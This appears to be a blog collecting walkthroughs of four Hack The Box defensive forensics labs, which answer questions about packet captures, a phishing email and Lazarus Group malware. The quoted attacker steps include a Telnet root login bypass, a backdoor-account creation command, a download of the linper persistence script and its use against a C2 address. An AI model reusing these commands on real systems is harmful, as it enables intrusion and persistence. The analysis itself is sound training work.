Today, we’re going to attack a Hack the Box Sherlock called Telly. You need to download the attached zip and extract it with the password hacktheblue to get started. Here’s our scenario.

You are a Junior DFIR Analyst at an MSSP that provides continuous monitoring and DFIR services to SMBs. Your supervisor has tasked you with analyzing network telemetry from a compromised backup server. A DLP solution flagged a possible data exfiltration attempt from this server. According to the IT team, this server wasn’t very busy and was sometimes used to store backups.

Okay. Let’s get started. Inside the zip is one network capture file, monitoringservice_export_202610AM-11AM.pcapng.

Task 1: What CVE is associated with the vulnerability exploited in the Telnet protocol?

First we’ll search to limit to just telnet traffic, since that’s what they are telling us to focus on. I just put telnet in the search bar and hit enter. These were my results.

Right click on that first packet (No. 47) and select Follow -> TCP Stream. You see this (I’m just showing the first few lines up until access is granted).

..%..&..... ..#..'..$
..%..&..&........ ..#..'..$
.. .....#.....'.........
.. .38400,38400....#.kali:0.0....'..USER.-f root.DISPLAY.kali:0.0......XTERM-256COLOR..
........"........!
........"..".....b........b....	B.
........
............................0.......!
..".....
.."....
..!............"..".............	..
........
.............
Linux 6.8.0-90-generic (backup-secondary) (pts/1)


........"
Welcome to Ubuntu 24.04.3 LTS (GNU/Linux 6.8.0-90-generic x86_64)

I’m curious about that 4th line, so I’m going to google part of that and see if that is indicative of the attack itself.

That shows us the answer in the AI overview as well as the top search result.

Task 1 Answer: CVE-2026-24061

Task 2: When was the Telnet vulnerability successfully exploited, granting the attacker remote root access on the target machine?

Currently (for me, anyway), my time is being displayed in relative time since packet capture started. If you go to View -> Time Display Format -> UTC Date and Time of Day, it will change and you can see the answer.

Task 2 Answer: 2026-01-27 10:39:28

Task 3: What is the hostname of the targeted server?

If we go back to that TCP stream that we followed starting at packet 47, we can see the entire convo. After access was granted, they were dropped a command prompt with their user and the host: root@backup-secondary.

Task 3 Answer: backup-secondary

Task 4: The attacker created a backdoor account to maintain future access. What username and password were set for that account?

Same stream, we can see the attacker issued these commands

sudo useradd -m -s /bin/bash cleanupsvc; echo "cleanupsvc:YouKnowWhoiam69" | sudo chpasswd

Task 4 Answer: cleanupsvc:YouKnowWhoiam69

Task 5: What was the full command the attacker used to download the persistence script?

This is really just becoming an exercise in how well we understand attacker actions. If we stay in the stream and see what the attacker is doing, we can easily see what they downloaded / how they downloaded it. There is some weird formatting because of the nature of typing and seeing responses and how long they may have delayed while typing, but here is the relevant part. Within the capture, red is what the user entered and blue is the response. That’s why you see it duplicated as they type.

w
w
g
g
e
e
t
t
 
 
.[200~https://raw.githubusercontent.com/montysecurity/linper/refs/heads/main/linper.sh.[201~

Task 5 Answer: wget https://raw.githubusercontent.com/montysecurity/linper/refs/heads/main/linper.sh

Task 6: The attacker installed remote access persistence using the persistence script. What is the C2 IP address?

Let’s keep scrolling in the stream and see what else they did. I looked around but nothing jumped out at me immediately. At this point, a lot of the commands were vertical with the repeated characters (one from the input, one from the output) and I wasn’t seeing it. So I looked into that script that we saw being run from here. Inside that script, we see this:

EXAMPLES="Examples:

\e[33mPrint\e[0m Commands that can be used to install persistence (assumes -d): bash linper.sh -i 192.168.1.2 -p 4444 --print 

So we are looking for this script to be called with a -i and then the address. Looking for that, I found this part:

bash linper.sh --enum-defenses
.
..[K
.
..[K
.
..[K
.
..[K
.
..[K
.
..[K
.
..[K
.
..[K
.
..[K
.
..[K
.
..[K
.
..[K
.
..[K
.
..[K
i
i
 
 
.[200~91.99.25.54.[201~
.[7m91.99.25.54.[27m
.[C
............91.99.25.54
 
 
-
-
p
p
 
 
5
5
9
9

You can see that the command bash linper.sh –enum-defenses -i 91.99.25.54 -p 5599 was called and that gives us our answer.

Task 6 Answer: 91.99.25.54

Task 7: The attacker exfiltrated a sensitive database file. At what time was this file exfiltrated?

As we’ve been getting familiar with this interaction, I’ve read over this stream several times and by this point, I remember seeing this file named credit-cards-25-blackfriday.db being referenced. If you go File -> Export Objects -> HTTP from the Wireshark menu, you see this

We can see that it was exported in packet 9380. If I click that row it takes me to the packet (if you still have the stream filter on, it will take you to 9378 instead… they have the same timestamp to the second, though). I can see the date under the Time column.

Task 7 Answer: 2026-01-27 10:49:54

Task 8: Analyze the exfiltrated database. To follow compliance requirements, the breached organization needs to notify its customers. For data validation purposes, find the credit card number for a customer named Quinn Harris.

Okay, we left the objects to see the timestamp on the packet. Go back in File -> Export Objects -> HTTP, click the db row and click Save at the bottom. Choose somewhere to save it and let’s analyze it.

$ file credit-cards-25-blackfriday.db 
credit-cards-25-blackfriday.db: SQLite 3.x database, last written using SQLite version 3046001, file counter 7, database pages 3, cookie 0x7, schema 4, UTF-8, version-valid-for 7

We can see that it is SQLite, so let’s look further. There only seems to be one table and the only identifier seems to be email. So, I check at first to see if any email has quinn in the name and we find one row and that gives us the answer.

$ sqlite3 credit-cards-25-blackfriday.db
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .tables
purchases
sqlite> .schema
CREATE TABLE purchases (
  id INTEGER PRIMARY KEY AUTOINCREMENT,
  email TEXT NOT NULL,
  creditcardnumber INTEGER NOT NULL,
  purchase_date TEXT NOT NULL,   -- ISO date: YYYY-MM-DD
  item_purchased TEXT NOT NULL
);
CREATE TABLE sqlite_sequence(name,seq);
sqlite> select * from purchases where email like '%quinn%';
12|quinn.harris@hotmail.com|5312269047781209|2025-12-08|4K monitor

Task 8 Answer: 5312269047781209

And that’s it, we win. That was actually a pretty fun investigation. Let me know if you have any comments or rooms you’d like to see tackled.

Today, we’re tackling another Sherlock from HackTheBox called Vantage. You can find the room here. Download the Vantage.zip from the page and use the password hacktheblue to unzip it. Inside, you’ll find 2 .pcap files called controller.2025-07-01.pcap and web-server.2025-07-01.pcap. We will use these to answer the 14 Task Questions on this challenge. It is marked at “very easy”, but this does require some skill to pass it. I admit that my Wireshark querying isn’t the best, so I am really enjoying this opportunity to practice and get better. Our scenario is this:

A small company moved some of its resources to a private cloud installation. The developers left the redirect to the dashboard on their web server. The security team got an email from the alleged attacker stating that the user data was leaked. It is up to you to investigate the situation.

Let’s dig in. I will say that I might not always take the best, most efficient way to find these answers, but I will find them honestly and in a way that hopefully you can repeat. There are some questions when the answer could be found by a little brute force earlier in the process, but I wanted to try to have a methodology that would work in situations where brute force may not be practical (like real life situations).

Task 1: What tool did the attacker use to fuzz the web server ? (Format- include version e.g, nmap@7.80)

Because this question is asking about fuzzing a web server, I started by opening the web-server.2025-07-01.pcap file in Wireshark. To fuzzing, we only care about http traffic. So in the search bar in Wireshark, I just typed http and hit enter. This returned 7482 of the 21650 total packets.

We can see a lot of requests and responses back to back. If we go in the menu to Statistics -> Conversations -> TCP and check the IPv4 tab (there is nothing in IPv6), we see a TON of this traffic is coming from 117.200.21.26 and going to 157.230.81.229.

Next, I applied a filter of http && ip.src == 117.200.21.26 to see what that person is doing. But we need the user agent. You can dig through the packets and find what you want and Right Click -> Apply as Column and you’ll see that value for every request in the table. But this is what I’m REALLY bad at. I know the general makeup for network requests on the wire, but sometimes some things are hard to find. Here’s an easy way to do the same thing. Right Click in the Header of the results and choose Column Preferences.

Then click the Plus sign to add your custom column

A new column will appear titled “New Column” of type “Custom”. If you double click in each cell, you can edit. Change your values to this and click Apply and OK.

This shows you the answer. You can kind of skim down and see the same value over and over again of Fuzz Faster U Fool v2.1.0-dev. The answer wants something with a mask of ****@*.*.*. I happen to know that the popular fuzzing tool ffuf stands for “Fuzz Faster U Fool” (check out my post I did on ffuf for my Core Tools You Should Know series). Using the abbreviation seems to meet that criteria and trying it completes the task.

Task 1 Answer: ffuf@2.1.0

Task 2: Which subdomain did the attacker discover?

For this one, we already know that ffuf was being used to fuzz things. What we care about were times when it returned 200 OK or maybe even a redirect and not 404 Not Found. When I do that (using the IP we discovered above as the destination) with a filter like this

ip.dst  == 117.200.21.26 &&  _ws.col.info == "HTTP/1.1 200 OK  (text/html)"

I get a bunch of results. Most of them have a length of 596.

Let’s look for ones that don’t have that length.

ip.dst  == 117.200.21.26 &&  _ws.col.info == "HTTP/1.1 200 OK  (text/html)" && frame.len != 596

That only gives me 12 and glancing at the first few, they all are hits to http://cloud.vantage.tech and then other paths. So, there we go.

Task 2 Answer: cloud

Task 3: How many login attempts did the attacker make before successfully logging in to the dashboard?

Okay. First, what is the login URL? We’d know already if this was truly ours, but looking at one of the 12 responses, I see a request to http://cloud.vantage.tech/dashboard/auth/login/. So there we go. Let’s dig in there.

ip.dst  == 117.200.21.26 &&  http.request.uri == "/dashboard/auth/login/"

That attacker hitting that URI happened 4 times. 3 of them returned 200 OK and one returned 302 Found. The 302 is the redirect to let them in. That means they failed 3 times.

Task 3 Answer: 3

Task 4: When did the attacker download the OpenStack API remote access config file? (UTC)
So, step one, what even is that? What I do know is that a file was downloaded. If we use Wireshark and choose File -> Export Objects -> HTTP, we get a list of objects in the capture. Since this is a file and not a small HTML file, I clicked the Size header to sort by size descending.

I scrolled down a little and there are 2 packets that are 1941 bytes each that have a filename of openrc. They are packets 21256 and 21260. Looking at those 2 packets, 20707 went from 10.116.0.4 to 10.116.0.3. 20711 went from 157.230.81.229 to our guy at 117.200.21.26. They also have the same timestamp on them, so we win either way. I’m just showing the relevant part under Hypertext Transfer Protocol

Hypertext Transfer Protocol, has 3 chunks (including last chunk)
    HTTP/1.1 200 OK\r\n
        Response Version: HTTP/1.1
        Status Code: 200
        [Status Code Description: OK]
        Response Phrase: OK
    Date: Tue, 01 Jul 2025 09:40:29 GMT\r\n
    Server: Apache/2.4.58 (Ubuntu)\r\n
    Content-Disposition: attachment; filename="admin-openrc.sh"\r\n

Task 4 Answer: 2025-07-01 09:40:29

Task 5: When did the attacker first interact with the API on controller node? (UTC)
Okay, now we switch to opening the controller.2025-07-01.pcap file. I added this filter and found the first HTTP request.

ip.src==117.200.21.26 && http

Within the Frame, we have this and it gives us the answer.

Frame 8490: Packet, 293 bytes on wire (2344 bits), 293 bytes captured (2344 bits)
    Encapsulation type: Linux cooked-mode capture v2 (210)
    Arrival Time: Jul  1, 2025 05:41:44.667723000 EDT
    UTC Arrival Time: Jul  1, 2025 09:41:44.667723000 UTC
    Epoch Arrival Time: 1751362904.667723000

Task 5 Answer: 2025-07-01 09:41:44

Task 6: What is the project id of the default project accessed by the attacker?
This is another one where if people from our company were doing the forensics, we’d already know how to look. But you and I are guessing, so I made an assumption that the URL would have project in it and did this filter

ip.src==117.200.21.26 && http.request.uri contains "project"

That gives me only 5 requests and one looks super obvious. If I right-click on that one and choose Follow -> HTTP Stream we get this, which contains our answer.

GET /identity/v3/projects?domain_id=default&name=admin HTTP/1.1
Host: 134.209.71.220
User-Agent: openstacksdk/4.6.0 keystoneauth1/5.11.1 python-requests/2.32.4 CPython/3.13.5
Accept-Encoding: gzip, deflate
Accept: application/json
Connection: keep-alive
X-Auth-Token: gAAAAABoY67QSl3AarKC9p_FCUhm-zdlkNPcgfqpHncXtnKqPhHgH79XnHa-4IrDf4WlL8QpLiKIQOE8C4kq3Tv21nkTpzMAuGXwLZkEeexqQlLfUtyrhmGjKsFvflRlIEZb0A-1oQZLVzdk1021QkPqjVjFonIEIEBgH0oZll7xE2hp7Scnm2o


HTTP/1.1 200 OK
Date: Tue, 01 Jul 2025 09:48:01 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Type: application/json
Content-Length: 476
Vary: X-Auth-Token
x-openstack-request-id: req-14b6f50c-12f4-48f9-be96-898430e4fe66
Connection: close

{"projects": [{"id": "9fb84977ff7c4a0baf0d5dbb57e235c7", "name": "admin", "domain_id": "default", "description": "Bootstrap project for initializing the cloud.", "enabled": true, "parent_id": "default", "is_domain": false, "tags": [], "options": {}, "links": {"self": "http://134.209.71.220/identity/v3/projects/9fb84977ff7c4a0baf0d5dbb57e235c7"}}], "links": {"next": null, "self": "http://134.209.71.220/identity/v3/projects?domain_id=default&name=admin", "previous": null}}

Task 6 Answer: 9fb84977ff7c4a0baf0d5dbb57e235c7

Task 7: Which OpenStack service provides authentication and authorization for the OpenStack API?
I literally just Googled the question. The answer came right up.

Task 7 Answer: keystone

Task 8: What is the endpoint URL of the swift service?
I have no idea what this is either. This is another thing that if you worked for a company (or were even doing an investigation for a company that contracted you), you would have intel on this kind of thing. As it is, I googled it, the AI overview included this

Structure: http://:8080/v1/AUTH_

Okay, so I went into Statistics -> Http -> Requests. I scanned down until I found the part hitting port 8080 with a /V1/Auth pattern and bingo.

Task 8 Answer: http://134.209.71.220:8080/v1/AUTH_9fb84977ff7c4a0baf0d5dbb57e235c7

Task 9: How many containers were discovered by the attacker?
So I did a filter of http.request.uri == “/v1/AUTH_9fb84977ff7c4a0baf0d5dbb57e235c7?format=json”. This gave me 2 results. I right clicked on the first one and chose Follow -> HTTP Stream. I can see that the response back was

[{"name": "dev-files", "count": 0, "bytes": 0, "last_modified": "2025-07-01T04:22:36.008860", "storage_policy": "Policy-0"}, {"name": "employee-data", "count": 0, "bytes": 0, "last_modified": "2025-07-01T04:22:28.334080", "storage_policy": "Policy-0"}, {"name": "user-data", "count": 0, "bytes": 0, "last_modified": "2025-07-01T04:22:07.707130", "storage_policy": "Policy-0"}]

That represents 3 containers: dev-files, employee-data, and user-data.

Task 9 Answer: 3

Task 10: When did the attacker download the sensitive user data file? (UTC)
If we look at the statistics again, we see a download of user-details.csv. If I put the filter to http.request.uri == “/v1/AUTH_9fb84977ff7c4a0baf0d5dbb57e235c7/user-data/user-details.csv” and right click and chose Follow -> HTTP Stream, you can see the time.

HTTP/1.1 200 OK
Content-Type: text/csv
Etag: 2197a57085557424cefc95f85efb7499
Last-Modified: Tue, 01 Jul 2025 04:31:31 GMT
X-Timestamp: 1751344290.17360
Accept-Ranges: bytes
Content-Length: 1367
X-Trans-Id: tx89c3d915d2c64b1c8cda1-006863ae33
X-Openstack-Request-Id: tx89c3d915d2c64b1c8cda1-006863ae33
Date: Tue, 01 Jul 2025 09:45:23 GMT
Connection: keep-alive

Task 10 Answer: 2025-07-01 09:45:23

Task 11: How many user records are in the sensitive user data file?
Same request, same stream window I have up from Task 10. You can see the response has this file’s contents and I count 28 records.

Full Name,Email,Phone Number
John Doe,john.doe@example.com,(123) 456-7890
Jane Smith,jane.smith@example.com,(234) 567-8901
Alice Johnson,a.johnson@example.com,(345) 678-9012
Bob Brown,b.brown@example.com,(456) 789-0123
Charlie Davis,c.davis@example.com,(567) 890-1234
Diana Wilson,d.wilson@example.com,(678) 901-2345
Ethan Moore,e.moore@example.com,(789) 012-3456
Fiona Taylor,f.taylor@example.com,(890) 123-4567
George Wilson,g.wilson@example.com,(901) 234-5678
Helen Adams,h.adams@example.com,(012) 345-6789
Ian Lee,i.lee@example.com,(123) 456-7890
Julia Smith,j.smith@example.com,(234) 567-8901
Kevin Miller,k.miller@example.com,(345) 678-9012
Laura Evans,l.evans@example.com,(456) 789-0123
Michael Thomas,m.thomas@example.com,(567) 890-1234
Natalie Wilson,n.wilson@example.com,(678) 901-2345
Oliver Johnson,o.johnson@example.com,(789) 012-3456
Penny Davis,p.davis@example.com,(890) 123-4567
Quinn Lee,q.lee@example.com,(901) 234-5678
Rachel Moore,r.moore@example.com,(012) 345-6789
Simon Evans,s.evans@example.com,(123) 456-7890
Tara Wilson,t.wilson@example.com,(234) 567-8901
Uma Johnson,u.johnson@example.com,(345) 678-9012
Vivian Lee,v.lee@example.com,(456) 789-0123
William Thomas,w.thomas@example.com,(567) 890-1234
Xander Wilson,x.wilson@example.com,(678) 901-2345
Yara Johnson,y.johnson@example.com,(789) 012-3456
Zoe Lee,z.lee@example.com,(890) 123-4567

Task 11 Answer: 28

Task 12: For persistence, the attacker created a new user with admin privileges. What is the username of the new user?
For this one, I went back to the statistics with all of the URLs and made some assumptions. This API seems fairly well-designed in a “discoverable” sense. That means I expect a user will be created by issuing a POST to a URL that has user or users in it. Glancing in my list, I see /identity/v3/users, so I changed my filter to http.request.uri == “/identity/v3/users” to see what we get.

Here we can see a POST and a response of 201-CREATED. That seems promising. If we right click and Follow -> HTTP Stream on the post request, we get this with our user’s name.

POST /identity/v3/users HTTP/1.1
Host: 134.209.71.220
User-Agent: openstacksdk/4.6.0 keystoneauth1/5.11.1 python-requests/2.32.4 CPython/3.13.5
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
X-Auth-Token: gAAAAABoY67QSl3AarKC9p_FCUhm-zdlkNPcgfqpHncXtnKqPhHgH79XnHa-4IrDf4WlL8QpLiKIQOE8C4kq3Tv21nkTpzMAuGXwLZkEeexqQlLfUtyrhmGjKsFvflRlIEZb0A-1oQZLVzdk1021QkPqjVjFonIEIEBgH0oZll7xE2hp7Scnm2o
Content-Type: application/json
Content-Length: 130

{"user": {"password": "P@$$word", "enabled": true, "default_project_id": "9fb84977ff7c4a0baf0d5dbb57e235c7", "name": "jellibean"}}
HTTP/1.1 201 CREATED
Date: Tue, 01 Jul 2025 09:48:02 GMT
Server: Apache/2.4.58 (Ubuntu)
Content-Type: application/json
Content-Length: 312
Vary: X-Auth-Token
x-openstack-request-id: req-70234e40-c6b0-4192-b478-e5cd3732d419
Connection: close

{"user": {"id": "c373da67a62b48f393c45dc071fa80b8", "name": "jellibean", "domain_id": "default", "enabled": true, "default_project_id": "9fb84977ff7c4a0baf0d5dbb57e235c7", "password_expires_at": null, "options": {}, "links": {"self": "http://134.209.71.220/identity/v3/users/c373da67a62b48f393c45dc071fa80b8"}}}

Task 12 Answer: jellibean

Task 13: What is the password of the new user?
Looking at the results in Task 12, we can see the password they set.

Task 13 Answer: P@$$word

Task 14: What is MITRE tactic id of the technique in task 12?
Okay. This isn’t in the files at all and just requires some research. What did Task 12 ask us? It was about creating an account for user persistence (rather than trusting credentials you cracked / uncovered, or leaving a command and control mechanism, etc). Let’s google that. I found out that that is T1136, but the answer wants a sub-technique.

This was a Cloud Account (it wasn’t local to a machine, nor was it on a domain, so this is the most obvious choice), so that makes our answer clear.

Task 14 Answer: T1136.003

And that’s it. This is one of the longest of these that I’ve done. There was a lot of explanations and steps and documentation, but hopefully you all stuck around and I made enough sense to follow along.

This time, we’re taking a look at another Sherlock from Hack the Box called PhishNet. We can probably already guess by the name that this is going to be some Blue Team work around investigating emails or a phishing attack or the like and it turns out that this is a fun little adventure into entry-level email header research. If we take a look at the scenario, we get this: “An accounting team receives an urgent payment request from a known vendor. The email appears legitimate but contains a suspicious link and a .zip attachment hiding malware. Your task is to analyze the email headers, and uncover the attacker’s scheme.”

So there we have it. To start off, we download the .zip file attached to the lab and unzip it using the provided password hacktheblue. Inside, we find one file called email.eml.

Task 1: What is the originating IP address of the sender?

To start off and answer a few of these questions, we can just open the .eml file in plain text viewer of our choice. The answer to this one is right near the top. These headers both agree, so this is definitely the answer.

X-Originating-IP: [45.67.89.10]
...
X-Sender-IP: 45.67.89.10

Task 1 Answer: 45.67.89.10

Task 2: Which mail server relayed this email before reaching the victim?

Looking at the headers again, we see the following. The last server to touch it was mail.business-finance.com. HTB didn’t want that, but the IP instead.

Received: from mail.business-finance.com ([203.0.113.25])
	by mail.target.com (Postfix) with ESMTP id ABC123;
	Mon, 26 Feb 2025 10:15:00 +0000 (UTC)
Received: from relay.business-finance.com ([198.51.100.45])
	by mail.business-finance.com with ESMTP id DEF456;
	Mon, 26 Feb 2025 10:10:00 +0000 (UTC)
Received: from finance@business-finance.com ([198.51.100.75])
	by relay.business-finance.com with ESMTP id GHI789;
	Mon, 26 Feb 2025 10:05:00 +0000 (UTC)

Task 2 Answer: 203.0.113.25

Task 3: What is the sender’s email address?

I wasn’t sure if this was a trick or not, but nothing here appears too crazy and these items all agree, so this is definitely the answer.

Return-Path: <finance@business-finance.com>
...
X-Envelope-From: finance@business-finance.com
...
From: "Finance Dept" <finance@business-finance.com>

Task 3 Answer: finance@business-finance.com

Task 4: What is the ‘Reply-To’ email address specified in the email?

This is at the top (second line). This might seem shady at first, but it is pretty common for emails to be sent from one mailbox that’s unmonitored and to have replies directed to a monitored box.

Reply-To: <support@business-finance.com>

Task 4 Answer: support@business-finance.com

Task 5: What is the SPF (Sender Policy Framework) result for this email?

Headers again.

Received-SPF: Pass (protection.outlook.com: domain of business-finance.com designates 45.67.89.10 as permitted sender)

Task 5 Answer: Pass

Task 6: What is the domain used in the phishing URL inside the email?

Reading the email, we find a link coded as follows:

<a href="https://secure.business-finance.com/invoice/details/view/INV2025-0987/payment">Download Invoice</a>

Task 6 Answer: secure.business-finance.com

Task 7: What is the fake company name used in the email?

Check and see how the rogues signed their email.

<p>Best regards,<br>Finance Department<br>Business Finance Ltd.</p>

Task 7 Answer: Business Finance Ltd.

Task 8: What is the name of the attachment included in the email?

Down at the very bottom, under where it starts --boundary123

Content-Type: application/zip; name="Invoice_2025_Payment.zip"

Content-Disposition: attachment; filename="Invoice_2025_Payment.zip"

Task 8 Answer: Invoice_2025_Payment.zip

Task 9: What is the SHA-256 hash of the attachment?

There are probably a lot of ways to do this. In this case, I’m using ripmime (sudo apt install ripmime)

$ ripmime -i email.eml 
$ ls
email.eml  Invoice_2025_Payment.zip  textfile0  textfile1
$ sha256sum Invoice_2025_Payment.zip 
8379c41239e9af845b2ab6c27a7509ae8804d7d73e455c800a551b22ba25bb4a  Invoice_2025_Payment.zip

Task 9 Answer: 8379c41239e9af845b2ab6c27a7509ae8804d7d73e455c800a551b22ba25bb4a

Task 10: What is the filename of the malicious file contained within the ZIP attachment?

When I try to use unzip to unzip this, I get an error. When I use 7Zip, it yells at me, but extracts a file, giving us the answer.

$ unzip Invoice_2025_Payment.zip 
Archive:  Invoice_2025_Payment.zip
  End-of-central-directory signature not found.  Either this file is not
  a zipfile, or it constitutes one disk of a multi-part archive.  In the
  latter case the central directory and zipfile comment will be found on
  the last disk(s) of this archive.
unzip:  cannot find zipfile directory in one of Invoice_2025_Payment.zip or
        Invoice_2025_Payment.zip.zip, and cannot find Invoice_2025_Payment.zip.ZIP, period. 

$ 7z x Invoice_2025_Payment.zip 

7-Zip 25.01 (x64) : Copyright (c) 1999-2025 Igor Pavlov : 2025-08-03
 64-bit locale=en_US.UTF-8 Threads:128 OPEN_MAX:1024, ASM

Scanning the drive for archives:
1 file, 75 bytes (1 KiB)

Extracting archive: Invoice_2025_Payment.zip

ERRORS:
Unexpected end of archive

--
Path = Invoice_2025_Payment.zip
Type = zip
ERRORS:
Unexpected end of archive
Physical Size = 75
Characteristics = Local

ERROR: Data Error : invoice_document.pdf.bat
                               
Sub items Errors: 1

Archives with Errors: 1

Open Errors: 1

Sub items Errors: 1        

Doing a little research, I also apparently could have used exiftool and found the information like this

$ exiftool Invoice_2025_Payment.zip 
ExifTool Version Number         : 13.44
File Name                       : Invoice_2025_Payment.zip
Directory                       : .
File Size                       : 75 bytes
File Modification Date/Time     : 2026:02:11 15:52:58-05:00
File Access Date/Time           : 2026:02:11 15:52:58-05:00
File Inode Change Date/Time     : 2026:02:11 15:52:58-05:00
File Permissions                : -rw-------
Warning                         : Format error reading ZIP file
File Type                       : ZIP
File Type Extension             : zip
MIME Type                       : application/zip
Zip Required Version            : 20
Zip Bit Flag                    : 0
Zip Compression                 : Deflated
Zip Modify Date                 : 2025:02:26 15:56:48
Zip CRC                         : 0x2a8e3d17
Zip Compressed Size             : 1249907
Zip Uncompressed Size           : 1690811
Zip File Name                   : invoice_document.pdf.bat

Task 10 Answer: invoice_document.pdf.bat

Task 11: Which MITRE ATT&CK techniques are associated with this attack?

So this information isn’t located in the file. I also searched our SHA256 on VirusTotal and there were a ton of MITRE ATT&CK techniques associated with the file, so I had to think broader. What kind of attack is this? This is a phishing attack. Specifically, it seems like a targeted phishing attack making it likely spearphishing. However, it doesn’t qualify as whaling because this isn’t a single high-value individual being targeted. When we look up Phishing on the MITRE ATT&CK pages, we see this category and sub-categories.

Given that this was phishing with an attachment, I tried T1566.001 and that is what they wanted.

Task 11 Answer: T1566.001

Today, I’m going to tackle Dream Job-2 on Hack the Box, a follow-up to Dream Job-1, which I previously walked through. Dream Job-2 is another Sherlock, which means that we’re doing Blue Team work to investigate. In this case, our story is this: “As a Threat Intelligence Analyst investigating Operation Dream Job, you have identified that the Lazarus Group utilized a variety of custom-built malware and tools to facilitate their operations. Your task is to analyze and gather intelligence on the malware utilized by this APT.“.

We need to download the .zip file and unzip it using the password of hacktheblue. Inside the .zip file is another zip file. When you attempt to unzip it, a text file comes out, but then you are prompted for more passwords to get the other files. The text file says this:

Dear User,

This text file is to warn you that the ZIP file contains software that is going to interact with your computer and files. This software has been intentionally included for educational purposes and is NOT intended to be executed or used otherwise. Always handle such files in isolated, controlled, and secure environments.

It is strongly recommend you proceed by:

1 - Running the sample in a controlled environment, for example EP Pwnbox or an isolated virtual machine.
2 - Only unzip the software in this controlled environment, using the password provided.
3 - Unzip the file in the VM and enjoy analysing!

PLEASE EXERCISE EXTREME CAUTION!

The ZIP file containing the software is password-protected for your safety. The password is "Dvn62WlNrt09". It is strongly recommended that you do NOT extract or execute the contents of this ZIP file unless you understand the risks involved.

By reading this file and using the provided password to unzip the file, you acknowledge and fully understand the risks as detailed in this warning.

Being very duly warned, we’ll move on.

Task 1: According to MITRE ATT&CK, what previously known malware does DRATzarus share similarities with?

If we search for DRATzarus on the MITRE ATT&CK site, we land on the page here. The page opens with “DRATzarus is a remote access tool (RAT) that has been used by Lazarus Group to target the defense and aerospace organizations globally since at least summer 2020. DRATzarus shares similarities with Bankshot, which was used by Lazarus Group in 2017 to target the Turkish financial sector.”

Task 1 Answer: Bankshot

Task 2: Which Windows API function does DRATzarus use to detect the presence of a debugger?

On the same page, under Enterprise -> Debugger Evasion, it says “DRATzarus can use IsDebuggerPresent to detect whether a debugger is present on a victim”

Task 2 Answer: IsDebuggerPresent

Task 3: Torisma is another piece of malware used by the Lazarus Group. According to MITRE, it has encrypted its C2 communications using XOR and which other method?

Looking up Torisma on the MITRE site, we land here. Under the section Enterprise -> Encrypted Channel: Symmetric Cryptography, it says “Torisma has encrypted its C2 communications using XOR and VEST-32“.

Task 3 Answer: VEST-32

Task 4: Which packing method has been used to obfuscate Torisma?

Same page as Task 3, under Enterprise -> Obfuscated Files or Information: Software Packing, it says “Torisma has been packed with lz4 compression“.

Task 4 Answer: lz4 compression

Task 5: Analyze the provided ISO file and identify the executable contained within it?

So this requires us to delve in to the “dangerous” part of that zip file. I’m doing this on a Kali snapshot that I have for this task. I ran these commands to mount the .iso and see its contents.

$ sudo mkdir -p /mnt/bae                  
[sudo] password for kali: 
                                                                             
$ sudo mount -o loop BAE_HPC_SE.iso /mnt/bae
mount: /mnt/bae: WARNING: source write-protected, mounted read-only.
                                                                             
$ ls /mnt/bae                 
BAE_HPC_SE.pdf  InternalViewer.exe

Task 5 Answer: InternalViewer.exe

Task 6: The executable found in the previous question was renamed. Can you identify its original name?

This only works if the metadata is kept on the file. I can use exiftool to read that metadata and get our answer.

$ exiftool /mnt/bae/InternalViewer.exe 
ExifTool Version Number         : 13.36
File Name                       : InternalViewer.exe
Directory                       : /mnt/bae
File Size                       : 11 MB
File Modification Date/Time     : 2020:06:05 03:00:44-04:00
File Access Date/Time           : 2020:06:05 03:00:44-04:00
File Inode Change Date/Time     : 2020:06:05 03:00:44-04:00
File Permissions                : -r-xr-xr-x
File Type                       : Win64 EXE
File Type Extension             : exe
MIME Type                       : application/octet-stream
Machine Type                    : AMD AMD64
Time Stamp                      : 2020:05:12 15:26:17-04:00
Image File Characteristics      : Executable, Large address aware
PE Type                         : PE32+
Linker Version                  : 14.21
Code Size                       : 10465280
Initialized Data Size           : 45056
Uninitialized Data Size         : 34689024
Entry Point                     : 0x2b10580
OS Version                      : 6.0
Image Version                   : 0.0
Subsystem Version               : 6.0
Subsystem                       : Windows GUI
File Version Number             : 3.2.0.0
Product Version Number          : 3.2.0.0
File Flags Mask                 : 0x0000
File Flags                      : (none)
File OS                         : Windows NT 32-bit
Object File Type                : Executable application
File Subtype                    : 0
Language Code                   : English (U.S.)
Character Set                   : Windows, Latin1
File Description                : SumatraPDF
File Version                    : 3.2
Legal Copyright                 : Copyright 2006-2020 all authors (GPLv3)
Original File Name              : SumatraPDF.exe
Product Name                    : SumatraPDF
Product Version                 : 3.2
Company Name                    : Krzysztof Kowalczyk

Task 6 Answer: SumatraPDF.exe

Task 7: According to VirusTotal, when was the EXE from the previous question First Seen In The Wild?(UTC)

So, in order to get the information from VirusTotal, the easiest thing for us to do is get the MD5 hash of this file and then search it.

$ md5sum /mnt/bae/InternalViewer.exe 
38032a4d12d9e3029f00b120200e8e68  /mnt/bae/InternalViewer.exe

Searching that hash brings us here. From there, we go to the Details tab and then scroll down to history to find our answer.

Task 7 Answer: 2020-08-13 08:44:50

Task 8: What packer was used to pack the executable from Question 6? (Full name)

Still on that details tab in VirusTotal, look up a bit

But they want the full name. What does UPX stand for? A quick Google lands us here, where we learn it is Ultimate Packer for Executables

Task 8 Answer: Ultimate Packer for Executables

Task 9: What is the full URL found within the macro in the document Salary_Lockheed_Martin_job_opportunities_confidential.doc?

Okay, now we are being very careful. I’m on Linux and not running Office, so I’m at a little less risk than someone who is investigating this with Windows, but tread lightly here. There are ways of extracting macros on Linux, but I cheated a little here and used the strings utility and then grepped for things that looked like a URL and that gave me the answer.

$ strings Salary_Lockheed_Martin_job_opportunities_confidential.doc | grep "http"
https://markettrendingcenter.com/lk_job_oppor.docx

Task 9 Answer: https://markettrendingcenter.com/lk_job_oppor.docx

Task 10: Who is the author of the document Salary_Lockheed_Martin_job_opportunities_confidential.doc?

More exiftool fun.

$ exiftool Salary_Lockheed_Martin_job_opportunities_confidential.doc 
ExifTool Version Number         : 13.36
File Name                       : Salary_Lockheed_Martin_job_opportunities_confidential.doc
Directory                       : .
File Size                       : 1294 kB
File Modification Date/Time     : 2025:03:05 06:40:08-05:00
File Access Date/Time           : 2026:01:16 15:26:03-05:00
File Inode Change Date/Time     : 2026:01:16 15:07:03-05:00
File Permissions                : -rw-rw-r--
